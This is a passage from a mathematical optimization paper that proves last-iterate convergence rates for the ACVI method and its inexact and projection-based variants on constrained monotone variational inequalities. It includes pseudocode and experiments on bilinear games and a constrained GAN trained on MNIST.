The first two steps solve their subproblems exactly using an analytical expression for the solution, and the two primal variables converge to the same value, thus eventually satisfying both the inequality and equality constraints. See Algorithm 3 for a full description, and see Fig. 2 for illustrative examples. The authors documented that projection-based methods may zig-zag extensively when hitting a constraint when there is a rotational component in the vector field, an observation that further motivates projection-free approaches even when the projection is simple. Yang et al. showed that the gap function of the last iterate of ACVI decreases at a rate of $\mathcal{O}(1/\sqrt{K})$ when the operator is $L$-Lipschitz, monotone, and at least one constraint is active. It is, however, an open problem to determine whether the same rate on the gap function applies while assuming only that the operator is monotone (where monotonicity for VIs is analogous to convexity for standard minimization; see Def. 2.1). Moreover, in some cases, the subproblems of ACVI may be cumbersome to solve analytically. Hence, a natural question is whether ACVI converges when the subproblems are solved approximately. As a result, we raise the following questions:

- Does the last iterate of ACVI converge when the operator is monotone without requiring it to be $L$-Lipschitz?
- Does ACVI converge when the subproblems are solved approximately?

In this paper, we answer the former question affirmatively. Specifically, we prove that the last iterate of ACVI converges at a rate of $\mathcal{O}\left(\frac{1}{\sqrt{K}}\right)$ in terms of the gap function (Def. 2.2) even when assuming only the monotonicity of the operator. The core of our analysis lies in identifying a relationship between the reference point of the gap function and a KKT point that ACVI targets implicitly (i.e., one that does not appear explicitly in the ACVI algorithm). This shows that ACVI explicitly works to decrease the gap function at each iteration. The argument further allows us to determine a convergence rate by making it possible to upper bound the gap function directly. This is in contrast to the approach of Yang et al. (2023), who upper bound the iterate distance and then the gap function, an approach that requires a Lipschitz assumption. This is the first convergence rate for the last iterate for monotone VIs with constraints that does not rely on an $L$-Lipschitz assumption on the operator. To address the latter question, we leverage a fundamental property of the ACVI algorithm—namely, its homotopic structure, as it smoothly transitions to the original problem, a homotopy that inherently arises from its origin as an interior-point method (Boyd & Vandenberghe, 2004). Moreover, due to the alternating updates of the two sets of parameters of ACVI ($x$ and $y$; see Algorithm 3), the subproblems change negligibly between iterations, with the changes proportional to the step sizes. This motivates the standard warm-start technique where, at every iteration, instead of initializing at random, we initialize the corresponding optimization variable with the approximate solution found at the previous iteration. We refer to the resulting algorithm as inexact ACVI, described in Algorithm 1. Furthermore, inspired by the work of Schmidt et al. (2011), which focuses on the proximal gradient method for standard minimization, we prove that inexact ACVI converges with the same rate of $\mathcal{O}\left(\frac{1}{\sqrt{K}}\right)$, under a condition on the rate of decrease of the approximation errors.
We evaluate inexact ACVI empirically on 2D and high-dimensional games and show how multiple inexact yet computationally efficient iterations can lead to faster wall-clock convergence than fewer exact ones. Finally, we provide a detailed study of a special case of the problem class that ACVI can solve. In particular, we focus on the case when the inequality constraints are simple, in the sense that projection onto them is fast to compute. Such problems often arise in machine learning, e.g., whenever the constraint set is an $L_p$-ball, with $p \in \{1, 2, \infty\}$, as in adversarial training (Goodfellow et al., 2015). We show that the same convergence rate holds for this variant of ACVI. Moreover, we show empirically that when using this method to train a constrained GAN on the MNIST (Lecun & Cortes, 1998) dataset, it converges faster than the projected variants of the standard VI methods. In summary, our main contributions are as follows:

- We show that the gap function of the last iterate of ACVI (Yang et al., 2023, Algorithm 1 therein) decreases at a rate of $\mathcal{O}\left(\frac{1}{\sqrt{K}}\right)$ for monotone VIs, without relying on the assumption that the operator is $L$-Lipschitz.
- We combine a standard warm-start technique with ACVI and propose a variant that solves the subproblems approximately, named inexact ACVI—see Algorithm 1. We show that inexact ACVI recovers the same convergence rate as ACVI, provided that the errors decrease at appropriate rates.
- We propose a variant of ACVI designed for inequality constraints that are fast to project onto—see Algorithm 2. We guarantee its convergence and provide the corresponding rate; in this case, we omit the central path, simplifying the convergence analysis.
- Empirically, we: (i) verify the benefits of warm-starting in inexact ACVI; (ii) observe that I-ACVI can be faster than other methods by taking advantage of cheaper approximate steps; (iii) train a constrained GAN on MNIST and show that the projected version of ACVI converges faster than other methods; and (iv) provide visualizations contrasting the different ACVI variants.

1.1 Related Works

**Last-iterate convergence of first-order methods on VI-related problems.** When solving VIs, the last and average iterates can be far apart; see examples in (Chavdarova et al., 2019). Thus, an extensive line of work has aimed at obtaining last-iterate convergence for special cases of VIs that are important in applications, including bilinear or strongly monotone games (e.g., Tseng, 1995; Malitsky, 2015; Facchinei & Pang, 2003; Daskalakis et al., 2018; Liang & Stokes, 2019; Gidel et al., 2019b; Azizian et al., 2020; Thekumparampil et al., 2022), and VIs with cocoercive operators (Diakonikolas, 2020). Several papers exploit continuous-time analyses, as these provide direct insights into last-iterate convergence and simplify the derivation of the Lyapunov potential function (Ryu et al., 2019; Bot et al., 2020; Rosca et al., 2021; Chavdarova et al., 2023; Bot et al., 2022). For monotone VIs, (i) Golowich et al. (2020b,a) established that the lower bound for $\tilde{p}$-stationary canonical linear iterative ($\tilde{p}$-SCLI) first-order methods (Arjevani et al., 2016) is $O(\frac{1}{\tilde{p}\sqrt{K}})$, (ii) Golowich et al. (2020b) obtained a rate in terms of the gap function, relying on first- and second-order smoothness of $F$, (iii) Gorbunov et al. (2022a) and Gorbunov et al.
(2022b) obtained a rate of $O(\frac{1}{K})$ for extragradient (Korpelevich, 1976) and optimistic GDA (Popov, 1980), respectively—in terms of reducing the squared norm of the operator, relying on first-order smoothness of $F$—and (iv) Golowich et al. (2020b) and Chavdarova et al. (2023) provided best-iterate rates for OGDA while assuming first-order smoothness of $F$. Daskalakis & Panageas (2019) focused on zero-sum convex-concave constrained problems and provided an asymptotic convergence guarantee for the last iterate of the optimistic multiplicative weights update (OMWU) method. For constrained and monotone VIs with an $L$-Lipschitz operator, Cai et al. (2022) recently showed that the last iterates of extragradient and optimistic GDA converge at a rate that matches the lower bound. Gidel et al. (2017) consider strongly convex-concave zero-sum games with a strongly convex constraint set to study the convergence of the Frank-Wolfe method (Lacoste-Julien & Jaggi, 2015).

**Interior point (IP) methods for VIs.** IP methods are a broad class of algorithms for solving problems with general inequality and equality constraints. One of the widely adopted subclasses of IP methods utilizes log-barrier terms to handle inequality constraints. These typically rely on Newton's method, which iteratively approaches the solution from the feasible region. Several works extend IP methods to constrained VI problems. Among these, Nesterov & Nemirovski (Chapter 7, 1994) study extensions to VI problems while relying on Newton's method. Further, an extensive line of work discusses specific settings (e.g., Chen et al., 1998; Qi & Sun, 2002; Qi et al., 2000; Fan & Yan, 2010). On the other hand, Goffin et al. (1997) described a second-order cutting-plane method for solving pseudomonotone VIs with linear inequalities. Although these methods enjoy fast convergence in terms of the number of iterations, each iteration requires computing second-order derivatives, which becomes computationally prohibitive for large-scale problems. Recently, Yang et al. (2023) derived the aforementioned ACVI method, which combines IP methods and the ADMM method, resulting in a first-order method that can handle general constraints.

2 Preliminaries

**Notation.** Bold small and bold capital letters denote vectors and matrices, respectively, while curly capital letters denote sets. We let $[n]$ denote $\{1, \ldots, n\}$ and let $e$ denote the vector of all 1's. The Euclidean norm of $v$ is denoted by $\|v\|$, and the inner product in Euclidean space by $\langle \cdot, \cdot \rangle$. $\odot$ denotes the element-wise product.

**Problem.** Let $\text{rank}(C) = p$ be the rank of the matrix $C$ in (CS). With abuse of notation, let $\varphi$ denote the concatenation of the $\varphi_i(\cdot), i \in [m]$. We assume that each of the inequality constraints is convex and that $\varphi_i \in C^1(\mathbb{R}^n), i \in [m]$. We define the following sets:

$$C_\leq \triangleq \{x \in \mathbb{R}^n \mid \varphi(x) \leq 0\}, \quad C_< \triangleq \{x \in \mathbb{R}^n \mid \varphi(x) < 0\}, \quad \text{and} \quad C_= \triangleq \{y \in \mathbb{R}^n \mid Cy = d\};$$

thus the relative interior of $C$ is $\text{int } C \triangleq C_< \cap C_=$. We assume $\text{int } C \neq \emptyset$ and that $C$ is compact. In the following, we list the necessary definitions and assumptions; see App. A for additional background. We state these for a general domain set $S$; by setting $S \equiv \mathbb{R}^n$ or $S \equiv \mathcal{X}$, they refer to the unconstrained and constrained settings, respectively.
We will use the standard gap function as a convergence measure; it requires $S$ to be compact in order to be well-defined.

**Definition 2.1 (monotone operators).** An operator $F : X \supseteq S \to \mathbb{R}^n$ is monotone on $S$ if and only if the following inequality holds for all $x, x' \in S$: $\langle x - x', F(x) - F(x') \rangle \geq 0$.

**Definition 2.2 (gap function).** Given a candidate point $x' \in X$ and a map $F : X \supseteq S \to \mathbb{R}^n$ where $S$ is compact, the gap function $G : \mathbb{R}^n \to \mathbb{R}$ is defined as: $G(x', S) \triangleq \max_{x \in S} \langle F(x'), x' - x \rangle$.

**Definition 2.3 ($\sigma$-approximate solution).** Given a map $F : X \to \mathbb{R}^n$ and a positive scalar $\sigma$, $x \in X$ is said to be a $\sigma$-approximate solution of $F(x) = 0$ iff $\|F(x)\| \leq \sigma$.

**Definition 2.4 ($\varepsilon$-minimizer).** Given a minimization problem $\min_x h(x)$, s.t. $x \in S$, and a fixed positive scalar $\varepsilon$, a point $\hat{x} \in S$ is said to be an $\varepsilon$-minimizer of this problem if and only if it holds that: $h(\hat{x}) \leq h(x) + \varepsilon, \forall x \in S$.

Figure 1: Convergence of ACVI and I-ACVI on the (2D-BG) problem. The central path is depicted in yellow. For all methods, we show the $y$-iterates initialized at the same point (blue circle). Each subsequent point on the trajectory depicts the (exact or approximate) solution at the end of the inner loop. A yellow star represents the game's Nash equilibrium (NE), and the constraint set is the interior of the red square. (a): As we decay $\mu_t$, the solutions of the inner loop of ACVI follow the central path; as $\mu_t \to 0$, the solution of the inner loop of ACVI converges to the NE. (b, c, d): When the $x$ and $y$ subproblems are solved approximately with finite $K$ and $\ell$, the iterates need not converge as the approximation error increases (and $K$ decreases). See § 5 for a discussion.
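When $S$ is a box, the maximum in Definition 2.2 is over a linear function of $x$ and is therefore attained coordinate-wise at the bounds, so the gap can be evaluated in closed form. A minimal sketch (our own illustration; the operator and names are not from the paper):

```python
import numpy as np

def gap_box(F, x_prime, lo, hi):
    """Gap function G(x', S) = max_{x in S} <F(x'), x' - x> for the box S = [lo, hi]^n.
    The inner maximum is linear in x, hence attained at a corner of the box."""
    g = F(x_prime)
    x_star = np.where(g > 0, lo, hi)   # minimizes <g, x> over the box
    return float(g @ (x_prime - x_star))

# illustrative operator: the bilinear game min_{x1} max_{x2} x1*x2, i.e., F(x) = (x2, -x1)
F = lambda x: np.array([x[1], -x[0]])
print(gap_box(F, np.array([1.0, 1.0]), -0.4, 2.4))  # gap of the point (1, 1)
```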
Algorithm 1 Inexact ACVI (I-ACVI) pseudocode.

1: **Input:** operator $F : X \to \mathbb{R}^n$, constraints $Cx = d$ and $\varphi_i(x) \leq 0, i \in [m]$, hyperparameters $\mu_{-1}, \beta > 0, \delta \in (0, 1)$, barrier map $\wp$ ($\wp_1$ or $\wp_2$), inner optimizers $A_x$ (e.g., EG, GDA) and $A_y$ (GD) for the $x$ and $y$ subproblems, resp.; outer and inner loop iterations $T$ and $K$, resp.
2: **Initialize:** $x^{(0)}_0 \in \mathbb{R}^n, y^{(0)}_0 \in \mathbb{R}^n, \lambda^{(0)}_0 \in \mathbb{R}^n$
3: $P_c \triangleq I - C^\top(CC^\top)^{-1}C$ where $P_c \in \mathbb{R}^{n \times n}$
4: $d_c \triangleq C^\top(CC^\top)^{-1}d$ where $d_c \in \mathbb{R}^n$
5: **for** $t = 0, \ldots, T - 1$ **do**
6: $\mu_t = \delta \mu_{t-1}$
7: **for** $k = 0, \ldots, K - 1$ **do**
8: Set $x^{(t)}_{k+1}$ to be a $\sigma_{k+1}$-approximate solution of: $x + \frac{1}{\beta} P_c F(x) - P_c y^{(t)}_k + \frac{1}{\beta} P_c \lambda^{(t)}_k - d_c = 0$ (w.r.t. $x$), by running $\ell^{(t)}_x$ steps of $A_x$, with $x$ initialized to the previous solution ($x^{(t)}_k$ if $k > 0$, else $x^{(t-1)}_K$)
9: Set $y^{(t)}_{k+1}$ to be an $\varepsilon_{k+1}$-minimizer of $\min_y \sum_{i=1}^m \wp(\varphi_i(y), \mu_t) + \frac{\beta}{2} \| y - x^{(t)}_{k+1} - \frac{1}{\beta} \lambda^{(t)}_k \|^2$, by running $\ell^{(t)}_y$ steps of $A_y$, with $y$ initialized to $y^{(t)}_k$ when $k > 0$, or $y^{(t-1)}_K$ otherwise
10: $\lambda^{(t)}_{k+1} = \lambda^{(t)}_k + \beta (x^{(t)}_{k+1} - y^{(t)}_{k+1})$
11: **end for**
12: $(y^{(t+1)}_0, \lambda^{(t+1)}_0) \triangleq (y^{(t)}_K, \lambda^{(t)}_K)$
13: **end for**

3 Convergence of the Exact and Inexact ACVI Algorithms for Monotone VIs

In this section, we present our main theoretical findings: (i) the rate of convergence of the last iterate of ACVI (the exact ACVI algorithm is stated in App. A) while relying exclusively on the assumption that the operator $F$ is monotone; and (ii) the corresponding convergence when the subproblems are solved approximately, where the proposed algorithm is referred to as inexact ACVI—Algorithm 1 ($\wp_1, \wp_2$ are defined below). Note that $F$ is assumed to be $L$-Lipschitz only for the latter result; moreover, if we run Algorithm 1 with extragradient for line 8, for example, the method only has a convergence guarantee if $F$ is $L$-Lipschitz (see Korpelevich, 1976, Theorem 1). For easier comparison with one-loop algorithms, we state both results for a fixed $\mu_{-1}$ (hence only the $k \in [K]$ iteration count appears), as in (Yang et al., 2023); nonetheless, the same rates hold without knowing $\mu_{-1}$—see App. B.4 in Yang et al. (2023) and our App. B.3. Thus, both guarantees are parameter-free.

3.1 Last Iterate Convergence of Exact ACVI

**Theorem 3.1** (Last iterate convergence rate of ACVI—Algorithm 1 in (Yang et al., 2023)). Given a continuous operator \( F : \mathcal{X} \to \mathbb{R}^n \), assume: (i) \( F \) is monotone on \( C_= \), as per Def. 2.1; (ii) either \( F \) is strictly monotone on \( C \) or one of the \( \varphi_i \) is strictly convex. Let \( (\mathbf{x}_K^{(t)}, \mathbf{y}_K^{(t)}, \lambda_K^{(t)}) \) denote the last iterate of ACVI. Given any fixed \( K \in \mathbb{N}_+ \) and a sufficiently small \( \mu_{-1} \), it holds for all \( t \in [T] \) that:

\[
G(\mathbf{x}_K^{(t)}, C) \leq O\left(\frac{1}{\sqrt{K}}\right), \quad \text{and} \quad \left\| \mathbf{x}_K^{(t)} - \mathbf{y}_K^{(t)} \right\| \leq O\left(\frac{1}{\sqrt{K}}\right).
\]

App. B gives the details on the constants that appear in the rates and the proof of Theorem 3.1.

3.2 Last Iterate Convergence Rate of Inexact ACVI

For some problems, the equation in line 8 or the convex optimization problem in line 9 of ACVI may not have an analytic solution, or the exact solution may be expensive to compute. Thus we consider solving these two problems approximately, using warm-starting: at each iteration, when solving the \( x \) and \( y \) subproblems, we initialize \( x \) and \( y \) to the respective solutions from the previous step, as described in Algorithm 1.
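To make lines 8-9 concrete, the following minimal sketch (our own illustration, not the authors' implementation) solves both subproblems approximately with a few warm-started gradient steps, in the case without equality constraints ($P_c = I$, $d_c = 0$) and with the log barrier $\wp_1$; step sizes and iteration counts are illustrative assumptions.

```python
import numpy as np

def solve_x(x, F, y, lam, beta, steps=10, lr=0.1):
    # line 8 with P_c = I, d_c = 0: find a root of  x + (F(x) + lam)/beta - y = 0
    # via fixed-point (GDA-style) iterations, warm-started at the previous solution
    for _ in range(steps):
        x = x - lr * (x + (F(x) + lam) / beta - y)
    return x

def solve_y(y, phi, grad_phi, x, lam, beta, mu, steps=10, lr=0.05):
    # line 9 with wp_1: min_y  sum_i -mu*log(-phi_i(y)) + (beta/2)||y - x - lam/beta||^2
    for _ in range(steps):
        g = beta * (y - x - lam / beta)
        for p, gp in zip(phi, grad_phi):
            g = g - mu / p(y) * gp(y)   # gradient of -mu*log(-phi_i); requires phi_i(y) < 0
        y = y - lr * g
    return y
```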
The following theorem—inspired by (Schmidt et al., 2011)—establishes that when the errors in the calculation of the subproblems satisfy certain conditions, the last-iterate convergence rate of inexact ACVI recovers that of (exact) ACVI. The theorem holds for the standard barrier function used for IP methods, \( \wp_1 \), as well as for a new barrier function \( \wp_2 \) that we propose, which is smooth and defined on the entire domain:

\[
\wp_1(z, \mu) = -\mu \log(-z), \qquad \wp_2(z, \mu) = \begin{cases} -\mu \log(-z), & z \leq -e^{-\frac{c}{\mu}} \\ \mu e^{\frac{c}{\mu}} z + \mu + c, & \text{otherwise,} \end{cases}
\]

where \( c \) in \( \wp_2 \) is a fixed constant. Choosing among these is denoted with \( \wp(\cdot) \) in Algorithm 1.

**Theorem 3.2** (Last iterate convergence rate of Inexact ACVI—Algorithm 1 with \( \wp_1 \) or \( \wp_2 \)). Given a continuous operator \( F : \mathcal{X} \to \mathbb{R}^n \), assume: (i) \( F \) is monotone on \( C_= \), as per Def. 2.1; (ii) either \( F \) is strictly monotone on \( C \) or one of the \( \varphi_i \) is strictly convex; and (iii) \( F \) is \( L \)-Lipschitz on \( \mathcal{X} \), that is, \( \|F(\mathbf{x}) - F(\mathbf{x'})\| \leq L \|\mathbf{x} - \mathbf{x'}\| \) for all \( \mathbf{x}, \mathbf{x'} \in \mathcal{X} \) and some \( L > 0 \). Let \( (\mathbf{x}_K^{(t)}, \mathbf{y}_K^{(t)}, \lambda_K^{(t)}) \) denote the last iterate of Algorithm 1; and let \( \sigma_k \) and \( \varepsilon_k \) denote the approximation errors at step \( k \) of lines 8 and 9 (as per Def. 2.3 and 2.4), respectively. Further, suppose: \( \lim_{K \to \infty} \frac{1}{\sqrt{K}} \sum_{k=1}^{K+1} k(\sqrt{\varepsilon_k} + \sigma_k) < +\infty \). Given any fixed \( K \in \mathbb{N}_+ \) and a sufficiently small \( \mu_{-1} \), it holds for all \( t \in [T] \) that:

\[
G(\mathbf{x}_K^{(t)}, C) \leq O\left(\frac{1}{\sqrt{K}}\right), \quad \text{and} \quad \left\| \mathbf{x}_K^{(t)} - \mathbf{y}_K^{(t)} \right\| \leq O\left(\frac{1}{\sqrt{K}}\right).
\]

As is the case for Theorem 3.1, Theorem 3.2 gives a nonasymptotic convergence guarantee: while the condition on the sequences \( \{\varepsilon_k\}_{k=1}^{K+1} \) and \( \{\sigma_k\}_{k=1}^{K+1} \) requires the given expression to be summable, the rate holds for any \( K \). App. B gives details on the constants in the rates of Theorem 3.2, provides the proof, and discusses algorithms \( A_x, A_y \) for the subproblems that satisfy the conditions. App. C discusses further details of the implementation of Algorithm 1; we analyze the effect of warm-starting in § 5.

4 Specialization of ACVI for Simple Inequality Constraints

We now consider the setting where the inequality constraints are simple, in that projection onto them is fast to compute. This scenario frequently occurs in machine learning, particularly when dealing with \( L_\infty \)-ball constraints. Projections onto the \( L_2 \) and \( L_1 \)-balls can also be obtained efficiently: through simple normalization for \( L_2 \), and with an \( O(n \log n) \) algorithm for \( L_1 \) (Duchi et al., 2008); see the sketch below. In ACVI, we then have the flexibility to substitute the \( y \)-subproblem with a projection onto the set defined by the inequalities. The \( x \)-subproblem still accounts for the equality constraints, and if there are none, it simplifies further since \( P_c \equiv I \) and \( d_c \equiv 0 \). Projection-based methods cannot leverage this structural advantage of simple inequality constraints, as the intersection with the equality constraints can be nontrivial.
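As referenced above, a minimal sketch of the two fast projections (the $L_1$ routine follows Duchi et al. (2008); this is an illustrative implementation, not the authors' code):

```python
import numpy as np

def project_linf(v, r=1.0):
    # projection onto the L_inf ball of radius r: coordinate-wise clipping
    return np.clip(v, -r, r)

def project_l1(v, r=1.0):
    # O(n log n) projection onto the L_1 ball of radius r (Duchi et al., 2008)
    if np.abs(v).sum() <= r:
        return v.copy()
    u = np.sort(np.abs(v))[::-1]          # sorted magnitudes, descending
    css = np.cumsum(u)
    rho = np.nonzero(u - (css - r) / np.arange(1, len(v) + 1) > 0)[0][-1]
    theta = (css[rho] - r) / (rho + 1)    # soft-thresholding level
    return np.sign(v) * np.maximum(np.abs(v) - theta, 0.0)
```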
**The P-ACVI Algorithm: omitting the log barrier.** Assume that the inequality constraints can be satisfied efficiently through a projection \( \Pi_\leq(\cdot) : \mathbb{R}^n \to C_\leq \). In that case, we no longer need the log barrier, and we omit \( \mu \) and the outer loop of ACVI over \( t \in [T] \). Differentiating the remaining expression of the \( y \)-subproblem with respect to \( y \) and setting it to zero gives:

$$\text{argmin}_y \frac{\beta}{2} \|y - x_{k+1} - \frac{1}{\beta} \lambda_k\|^2 = x_{k+1} + \frac{1}{\beta} \lambda_k.$$

This implies that line 9 of the exact ACVI algorithm (given in App. A) can be replaced with the solution of the \( y \)-problem without the inequality constraints, after which we can cheaply project to satisfy them: \( y_{k+1} = \Pi_\leq(x_{k+1} + \frac{1}{\beta} \lambda_k) \), where the \( \varphi_i(\cdot) \) are accounted for by the projection. We describe the resulting procedure in Algorithm 2 and refer to it as P-ACVI. In this scenario with simple \( \varphi_i \), the \( y \)-problem is always solved exactly; when the \( x \)-subproblem is additionally solved approximately, we refer to the method as PI-ACVI.

Algorithm 2 P-ACVI: ACVI with simple inequalities.

1: **Input:** operator $F : \mathcal{X} \to \mathbb{R}^n$, constraints $Cx = d$ and projection operator $\Pi_\leq$ for the inequality constraints, hyperparameter $\beta > 0$, and number of iterations $K$.
2: **Initialize:** $y_0 \in \mathbb{R}^n$, $\lambda_0 \in \mathbb{R}^n$
3: $P_c \triangleq I - C^\top(CC^\top)^{-1}C$ where $P_c \in \mathbb{R}^{n \times n}$
4: $d_c \triangleq C^\top (CC^\top)^{-1}d$ where $d_c \in \mathbb{R}^n$
5: **for** $k = 0, \ldots, K - 1$ **do**
6: Set $x_{k+1}$ to be the solution of: $x + \frac{1}{\beta} P_c F(x) - P_c y_k + \frac{1}{\beta} P_c \lambda_k - d_c = 0$ (w.r.t. $x$)
7: $y_{k+1} = \Pi_\leq(x_{k+1} + \frac{1}{\beta} \lambda_k)$
8: $\lambda_{k+1} = \lambda_k + \beta(x_{k+1} - y_{k+1})$
9: **end for**

Figure 2: Intermediate iterates of PI-ACVI (Algorithm 2) on the 2D minmax game (2D-BG). The boundary of the constraint set is shown in red. (b) depicts the $y_k$ (from line 7 in Algorithm 2), which we obtain through projections. In (a), each spiral corresponds to iteratively solving the $x_k$ subproblem for $\ell = 20$ steps (line 6 in Algorithm 2). Jointly, the trajectories of $x$ and $y$ illustrate the ACVI dynamics: $x$ and the constrained $y$ "collaborate" and converge to the same point.

**Last-iterate convergence of P-ACVI.** The following theorem shows that P-ACVI has the same last-iterate rate as ACVI. Its proof can be derived from that of Theorem 3.1, which covers a more general setting; see App. B. We state it as a separate theorem, as it cannot be deduced directly from the statement of the former.

**Theorem 4.1** (Last iterate convergence rate of P-ACVI—Algorithm 2). Given a continuous operator $F : \mathcal{X} \to \mathbb{R}^n$, assume $F$ is monotone on $\mathcal{C}_=$, as per Def. 2.1. Let $(x_K, y_K, \lambda_K)$ denote the last iterate of Algorithm 2. Then for all $K \in \mathbb{N}_+$, it holds that:

$$G(x_K, \mathcal{C}) \leq O\left(\frac{1}{\sqrt{K}}\right), \text{ and } \|x_K - y_K\| \leq O\left(\frac{1}{\sqrt{K}}\right).$$

**Remark 4.2.** Note that Theorem 4.1 relies on weaker assumptions than Theorem 3.1. This is a ramification of removing the central path in the P-ACVI algorithm: assumption (ii) of Theorem 3.1—used earlier to guarantee the existence of the central path (see App. A)—is no longer needed.
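To make Algorithm 2 concrete, the following is a minimal sketch (our own illustration; hyperparameter values are assumptions) of P-ACVI/PI-ACVI on the 2D bilinear game (2D-BG) of § 5, where there are no equality constraints (so $P_c = I$, $d_c = 0$) and the $x$-subproblem of line 6 is solved approximately with $\ell$ gradient steps.

```python
import numpy as np

F = lambda x: np.array([x[1], -x[0]])    # VI operator of min_{x1} max_{x2} x1*x2
proj = lambda x: np.clip(x, -0.4, 2.4)   # Pi_<= for the box constraint

beta, K, ell, lr = 0.5, 50, 20, 0.1
x = np.array([2.0, 2.0]); y = x.copy(); lam = np.zeros(2)
for k in range(K):
    for _ in range(ell):                          # approximate x-subproblem (line 6)
        x = x - lr * (x + (F(x) + lam) / beta - y)
    y = proj(x + lam / beta)                      # line 7: projection replaces the y-subproblem
    lam = lam + beta * (x - y)                    # line 8: dual update
print(x, y)                                       # both approach the NE at (0, 0)
```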
Figure 3: Experiments on the (C-GAN) game, using GDA, EG, and PI-ACVI on MNIST. All curves are averaged over 4 seeds. (a): Fréchet Inception Distance (FID, lower is better) given CPU wall-clock time. (b): Inception Score (IS, higher is better) given wall-clock time. We observe that PI-ACVI converges faster than EG and GDA for both metrics. Moreover, we see that using a large $\ell$ for the first iteration ($\ell_0$) can give a significant advantage. The two PI-ACVI curves use the same $\ell_+ = 20$.

Figure 4: Comparison between I-ACVI, (exact) ACVI, and projection-based algorithms on the (HBG) problem. (a): CPU time (in seconds) to reach a given relative error ($x$-axis), where the rotational intensity is fixed to $\eta = 0.05$ in (HBG) for all methods. (b): Number of iterations to reach a relative error of $0.02$ for varying values of the rotational intensity $\eta$. We fix the maximum number of iterations to $50$. (c): Joint impact of the number of inner-loop iterations $K_0$ at $t = 0$ and different choices of inner-loop iterations $K_+$ at any $t > 0$ on the number of iterations needed to reach a fixed relative error of $10^{-4}$. We see that irrespective of the selection of $K_+$, I-ACVI converges fast if $K_0$ is large enough. For instance, $(K_0 = 130, K_+ = 1)$ converges faster than $(K_0 = 20, K_+ = 20)$. We fix $\ell = 10$ in all of (a), (b), and (c).

5 EXPERIMENTS

**Methods.** We compare ACVI, Inexact ACVI (I-ACVI), and Projected-Inexact ACVI (PI-ACVI) with the projected variants of Gradient Descent Ascent (P-GDA), Extragradient (Korpelevich, 1976) (P-EG), Optimistic GDA (Popov, 1980) (P-OGDA), and Lookahead-Minmax (Zhang et al., 2019; Chavdarova et al., 2021) (P-LA). We always use GDA as the inner optimizer for I-ACVI, PI-ACVI, and P-ACVI. See App. C and D for implementation details and comparisons with additional methods.

**Problems.** We study the empirical performance of these methods on three different problems; the operator and simplex projection for the second problem are sketched in code after this list.

• 2D bilinear game: a version of the bilinear game with $L_\infty$ constraints, as follows:
$$\min_{x_1 \in \Delta} \max_{x_2 \in \Delta} x_1 x_2, \quad \text{with } \Delta = \{x \in \mathbb{R} \,|\, -0.4 \leq x \leq 2.4\}. \quad \text{(2D-BG)}$$

• High-dimensional bilinear game: each player is a 500-dimensional vector, and the iterates are constrained to the probability simplex. A parameter $\eta \in (0, 1)$ controls the rotational component of the game (when $\eta = 1$ the game is potential; when $\eta = 0$ it is Hamiltonian):
$$\min_{x_1 \in \Delta} \max_{x_2 \in \Delta} \eta x_1^\top x_1 + (1 - \eta) x_1^\top x_2 - \eta x_2^\top x_2, \quad \text{with } \Delta = \{x_i \in \mathbb{R}^{500} \,|\, x_i \geq 0, \ e^\top x_i = 1\}. \quad \text{(HBG)}$$

• MNIST. We train GANs on the MNIST (Lecun & Cortes, 1998) dataset, with linear inequality constraints and no equality constraints:
$$\min_{\theta \in \Delta_\theta} \max_{\zeta \in \Delta_\zeta} \mathbb{E}_{s \sim p_d} [\log D(s)] + \mathbb{E}_{z \sim p_z} [\log(1 - D(G(z)))] \quad \text{(C-GAN)}$$
where $\Delta_\theta = \{\theta \,|\, A_1 \theta \leq b_1\}$ and $\Delta_\zeta = \{\zeta \,|\, A_2 \zeta \leq b_2\}$, with $p_z$ and $p_d$ the noise and data distributions, respectively; $\theta$ and $\zeta$ are the parameters of the generator and discriminator, resp.; $G$ and $D$ are the generator and discriminator maps, parameterized by $\theta$ and $\zeta$, resp.; and $A_i \in \mathbb{R}^{100 \times n_i}$, $b_i \in \mathbb{R}^{n_i}$, where $n_i$ is the number of parameters of $G$ or $D$.
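As referenced above, a sketch of the (HBG) operator and of the $O(n \log n)$ simplex projection used for its constraint set (an illustrative implementation following Duchi et al. (2008), not the authors' code):

```python
import numpy as np

def project_simplex(v):
    # Euclidean projection onto {x >= 0, e^T x = 1} (Duchi et al., 2008)
    u = np.sort(v)[::-1]
    css = np.cumsum(u)
    rho = np.nonzero(u * np.arange(1, len(v) + 1) > css - 1.0)[0][-1]
    theta = (css[rho] - 1.0) / (rho + 1)
    return np.maximum(v - theta, 0.0)

def F_hbg(x, eta=0.05, n=500):
    # VI operator of (HBG): gradient for the min player x1, negated gradient
    # for the max player x2
    x1, x2 = x[:n], x[n:]
    return np.concatenate([2 * eta * x1 + (1 - eta) * x2,
                           2 * eta * x2 - (1 - eta) * x1])
```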
5.1 INEXACT ACVI

**2D bilinear game.** In Fig. 1, we compare exact and inexact ACVI on the 2D bilinear game (2D-BG). Rather than solving the subproblems of I-ACVI until appropriate accuracies are reached, herein we fix the numbers of iterations $K$ and $\ell$ in I-ACVI. We observe that I-ACVI can converge following the central path when the inner loop of I-ACVI over $k \in [K]$ is solved with sufficient precision. The two parameters influencing the convergence of the iterates to the central path are $K$ and $\ell$, where the latter is the number of iterations used to solve the two subproblems (lines 8 and 9 in Algorithm 1). Fig. 1 shows that small values such as $K = 20$ and $\ell = 2$ are sufficient for convergence on this purely rotational game. Nonetheless, as $K$ and $\ell$ decrease further, the iterates of I-ACVI may not converge. This accords with Theorem 3.2, which indicates that the sum of errors is bounded only if $K$ is large; hence, a larger $K$ implies a smaller error.

**HD bilinear game.** In Fig. 4(a) and Fig. 4(b) we compare I-ACVI with ACVI and the projection-based algorithms on the (HBG) problem. We observe that both ACVI and I-ACVI significantly outperform the remaining baselines in terms of speed of convergence, measured both in CPU time and in the number of iterations. Moreover, while I-ACVI requires more iterations than ACVI to reach a given relative error, those iterations are computationally cheap relative to solving each subproblem exactly; hence, I-ACVI converges much faster than any other method. Fig. 4(c) demonstrates that the subproblems of I-ACVI are suitable for warm-starting. Interestingly, we notice that the number of iterations at the first step $t = 0$ plays a crucial role. Given that we initialize variables at each iteration with the previous solution, it aids convergence to solve the subproblems as accurately as possible at $t = 0$. This initial accuracy reduces the initial error, subsequently decreasing the error at all subsequent iterations. We revisit this observation in § 5.3.

5.2 Projected-Inexact-ACVI

**2D bilinear game.** In Fig. 2 we show the dynamics of PI-ACVI on the 2D game defined by (2D-BG). Compared to ACVI in Fig. 1, the iterates converge to the solution without following the central path. A comparison with other optimizers is available in App. D.

